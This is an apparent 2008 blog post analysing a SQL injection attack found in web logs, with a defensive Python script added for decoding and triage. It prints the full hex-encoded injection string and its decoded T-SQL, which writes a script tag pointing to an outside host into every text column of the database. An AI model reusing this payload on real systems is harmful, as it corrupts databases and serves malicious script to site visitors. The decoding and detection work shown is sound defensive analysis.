Saturday, June 21, 2008

SQL Injection Attack

I monitor the logs of a number of web sites and one of them has recently come under a SQL Injection Attack. Here is the code that was being injected as a query parameter on a URL:

Exception in xxxxx.Page_Load() with param1=abc;DECLARE @S VARCHAR(4000);SET @S=CAST(
0x4445434C415245204054205641524348415228323535292C40432056415243484152283235352920444543
4C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C6
22E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520
612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5
220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D3136372920
4F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F4375727
36F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E
20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D2843
4F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C73637269707420737
2633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E2727272920
4645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420
434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220
AS VARCHAR(4000));EXEC(@S);--:
String or binary data would be truncated.
The statement has been terminated.

With thanks to the guys on AZGroups I managed to learn a lot about this.

There's a great discussion thread about this here:

http://www.webhostingtalk.com/showthread.php?t=686032

To decode the hex into the command that will be executed, run the following in SQL Server Management Studio (kudos to slide_o_mix):

DECLARE @S VARCHAR(4000);
SET @S=CAST(
    /* put the hex characters here, with the leading 0x */
AS VARCHAR(4000));
PRINT @S;

When decoded, the SQL Injection Attack reads as follows:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name,b.name FROM sysobjects a,syscolumns b
  WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chkadw.com/b.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Thanks to Scott Cate for further investigating this and decoding the riddle. Looks like the objective of this attack is to spam ads onto the target site.
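Here is an added example (not code from the original post) that automates the decoding step and the triage that followed it: it finds the CAST(0x... AS VARCHAR) literal in a request parameter, decodes it the way SQL Server would, and pulls out the script source the payload appends to every text column. The sample parameter is constructed from the hex string in the log excerpt above; the function names, the NVARCHAR (UTF-16LE) branch and the benign comparison value are assumptions that go a little beyond what the post shows.

```python
import re

# Constructed sample: the hex literal from the log excerpt above, with the
# wrapped log lines re-joined. Only the hex digits come from the post.
HEX_FROM_LOG = (
    "4445434C415245204054205641524348415228323535292C40432056415243484152283235352920444543"
    "4C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C6"
    "22E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520"
    "612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5"
    "220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D3136372920"
    "4F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F4375727"
    "36F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E"
    "20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D2843"
    "4F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C73637269707420737"
    "2633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E2727272920"
    "4645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420"
    "434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220"
)

# Constructed request values: the attack parameter as it appeared in the log,
# and an ordinary value that must not be flagged.
SAMPLE_PARAM = (
    "abc;DECLARE @S VARCHAR(4000);SET @S=CAST(0x" + HEX_FROM_LOG
    + " AS VARCHAR(4000));EXEC(@S);--"
)
BENIGN_PARAM = "abc"

# The trick in this attack: the real SQL is smuggled as a 0x... literal, so a
# keyword filter looking for UPDATE or sysobjects never sees them.
HEX_CAST_RE = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s*AS\s+(N?VARCHAR)", re.IGNORECASE
)
SCRIPT_SRC_RE = re.compile(r"<script\s+src=['\"]?([^'\">\s]+)", re.IGNORECASE)


def find_hex_cast(param_value):
    """Return (hex_digits, target_type) for a CAST(0x... AS [N]VARCHAR) literal, else None."""
    m = HEX_CAST_RE.search(param_value)
    return (m.group(1), m.group(2).upper()) if m else None


def decode_hex_sql(hex_digits, target_type="VARCHAR"):
    """Decode the literal as SQL Server's CAST would: one byte per char for VARCHAR,
    UTF-16LE for NVARCHAR (assumed variant, not shown in the post)."""
    if len(hex_digits) % 2:
        raise ValueError("odd-length hex literal; the log line is probably truncated")
    raw = bytes.fromhex(hex_digits)
    return raw.decode("utf-16-le") if target_type == "NVARCHAR" else raw.decode("latin-1")


def extract_script_sources(sql_text):
    """List the <script src=...> URLs the decoded statement would write into the database."""
    return SCRIPT_SRC_RE.findall(sql_text)


def analyse_param(param_value):
    """Triage one request parameter: is it this hex-CAST injection, and what does it inject?"""
    found = find_hex_cast(param_value)
    if found is None:
        return {"injection": False}
    hex_digits, target_type = found
    sql = decode_hex_sql(hex_digits, target_type)
    return {
        "injection": True,
        "decoded_sql": sql,
        "script_sources": extract_script_sources(sql),
        # The payload walks syscolumns to hit every text column of every user table.
        "touches_syscolumns": "syscolumns" in sql.lower(),
    }


if __name__ == "__main__":
    for value in (SAMPLE_PARAM, BENIGN_PARAM):
        result = analyse_param(value)
        print(result["injection"], result.get("script_sources"))
        if result["injection"]:
            print(result["decoded_sql"])
```

Running it on the captured parameter reproduces the decoded statement shown above and reports http://www.chkadw.com/b.js as the injected script; the benign value returns injection False. Pointing analyse_param at each query-string value in the web logs gives a quick way to spot further attempts and to see what each one was trying to write.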

1 comment:

  1. Recently came across this link which has some SQL Inject Defense Tools:
    blogs.msdn.com/.../sql-injection-d
    and this link:
    www.misfitgeek.com/.../Tools+To+Block+
    Haven't had a chance to look at them in any detail yet though...